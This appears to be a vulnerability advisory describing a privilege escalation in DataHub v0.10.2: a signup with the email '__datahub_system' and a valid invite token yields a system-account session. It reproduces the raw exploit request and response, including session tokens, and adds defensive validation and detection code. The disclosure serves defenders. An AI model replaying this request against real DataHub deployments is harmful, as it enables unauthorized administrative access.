Summary
Missing input validation in the user signup form allows an attacker to register an account with the "email" `__datahub_system`. An attacker with a valid invite token can create such an account and elevate their privileges to the system account.
Details
- Tested with the DataHub quickstart docker-compose file.
- Tested on version v0.10.2.
- Tested with the environment variable `METADATA_SERVICE_AUTH_ENABLED=true` set in the frontend and GMS containers.
![image](https://user-images.githubusercontent.com/18122064/234829319-6c000f28-3f7b-4a91-8c49-96c00e7d9449.png)
![image](https://user-images.githubusercontent.com/18122064/234829409-7b422707-679c-4c05-949f-79b89a97efd3.png)
PoC
The raw HTTP requests can be seen in the last "References" section.
- The attacker requires a valid invite token. The following screenshot illustrates how an invite token with "No Role" is created:
![image](https://user-images.githubusercontent.com/18122064/234827362-fd25cba2-53aa-417a-84ed-c9e3f29fd178.png)
- The attacker can sign up a user with the email `__datahub_system`. This account creation succeeds and the attacker gets a valid session cookie/token for the `__datahub_system` actor (see the following screenshot):
![image](https://user-images.githubusercontent.com/18122064/234828228-a9fb12b0-8d6e-4f99-a3a5-2595bc08b082.png)
- The attacker can use this cookie to access administrative APIs, for example to create an access token for the `__datahub_system` account:
![image](https://user-images.githubusercontent.com/18122064/234828729-af958990-aeb4-4598-a06c-574aa63d64d8.png)
Impact
This is a privilege escalation vulnerability which allows an attacker with a valid invite token to elevate their privileges from No Role to `__datahub_system`.
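As an added example (not DataHub's own code or fix), this is the kind of server-side check a signup handler needs so that the submitted "email" cannot become a reserved actor id, together with a detector that flags a response cookie issued for that actor. `RESERVED_ACTORS`, the `__`-prefix rule, the email regex and the function names are assumptions of this example; the sample body and cookie are taken from the advisory's request and response.

```python
import json
import re

# Principals an invite-based signup must never be able to claim. The advisory
# only shows __datahub_system; treating every "__"-prefixed id as reserved is
# an assumption of this example, not DataHub's own rule.
RESERVED_ACTORS = {"__datahub_system"}
# Deliberately simple address shape check (assumed, not DataHub's validator).
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
URN_PREFIX = "urn:li:corpuser:"

# Signup body from the advisory's request, and the actor cookie from its response.
ATTACK_BODY = ('{"fullName":"test3","email":"__datahub_system","password":"attackerPassword!",'
               '"title":"Data Scientist","inviteToken":"onyyqvpbgchmyosptbwlimylughnnrbc"}')
ATTACK_SET_COOKIE = "actor=urn:li:corpuser:__datahub_system; Max-Age=2592000; SameSite=Lax; Path=/"


def corpuser_urn(user_id: str) -> str:
    """Actor URN a session is issued for, in the shape the response cookie shows."""
    return URN_PREFIX + user_id


def validate_signup(body: str) -> list[str]:
    """Return the reasons a signup body must be rejected (empty list = accept)."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return ["body is not valid JSON"]
    errors = []
    email = str(data.get("email", "")).strip()
    if not EMAIL_RE.match(email):
        errors.append("email does not look like an address")
    # Check both the raw value and the local part, so that a reserved id cannot
    # be smuggled in as "<reserved>@example.com" either.
    local_part = email.split("@", 1)[0].lower()
    if email.lower() in RESERVED_ACTORS or local_part in RESERVED_ACTORS or email.startswith("__"):
        errors.append("email maps to a reserved actor id")
    if not data.get("inviteToken"):
        errors.append("missing inviteToken")
    return errors


def reserved_actor_in_set_cookie(set_cookie: str) -> bool:
    """Detection: true if a Set-Cookie line issues a session for a reserved actor
    (matches both the plain actor cookie and the URL-encoded PLAY_SESSION form)."""
    m = re.search(r"actor=(?:urn%3Ali%3Acorpuser%3A|urn:li:corpuser:)([^;&\s]+)", set_cookie)
    return bool(m) and m.group(1) in RESERVED_ACTORS
```

The cookie check is meant for a proxy or log pipeline in front of the frontend: a signup response that sets a reserved actor is the observable symptom of this bug, whatever the request looked like.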
References
Signup HTTP request

```http
POST /signUp HTTP/1.1
Host: localhost:9002
Content-Length: 149
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-platform: "macOS"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Testuser1
Content-Type: application/json
Accept: */*
Origin: http://localhost:9002
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9002/signup?invite_token=onyyqvpbgchmyosptbwlimylughnnrbc
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9
Cookie: bid=f5cf3cbe-752b-44f1-b61a-33d32e01b067
Connection: close

{"fullName":"test3","email":"__datahub_system","password":"attackerPassword!","title":"Data Scientist","inviteToken":"onyyqvpbgchmyosptbwlimylughnnrbc"}
```
Signup HTTP response

```http
HTTP/1.1 200 OK
Set-Cookie: PLAY_SESSION=41fdaca382e66e81909d903c83d24cc6f633299c-actor=urn%3Ali%3Acorpuser%3A__datahub_system&token=eyJhbGciOiJIUzI1NiJ9.eyJhY3RvclR5cGUiOiJVU0VSIiwiYWN0b3JJZCI6Il9fZGF0YWh1Yl9zeXN0ZW0iLCJ0eXBlIjoiU0VTU0lPTiIsInZlcnNpb24iOiIxIiwianRpIjoiYTc2OTA4MjQtMzVmZC00OWQ5LWIwZTMtN2EyMmQ0NjFkZGQ5Iiwic3ViIjoiX19kYXRhaHViX3N5c3RlbSIsImV4cCI6MTY4MjY3NDg0OCwiaXNzIjoiZGF0YWh1Yi1tZXRhZGF0YS1zZXJ2aWNlIn0.E7_x2Wta9Wlp3NT98D3WZwtogGr5dIpbRahjaJWYZEQ; SameSite=Lax; Path=/; HTTPOnly
Set-Cookie: actor=urn:li:corpuser:__datahub_system; Max-Age=2592000; Expires=Sat, 27 May 2023 09:40:48 GMT; SameSite=Lax; Path=/
Date: Thu, 27 Apr 2023 09:40:48 GMT
Connection: close
Content-Length: 0
```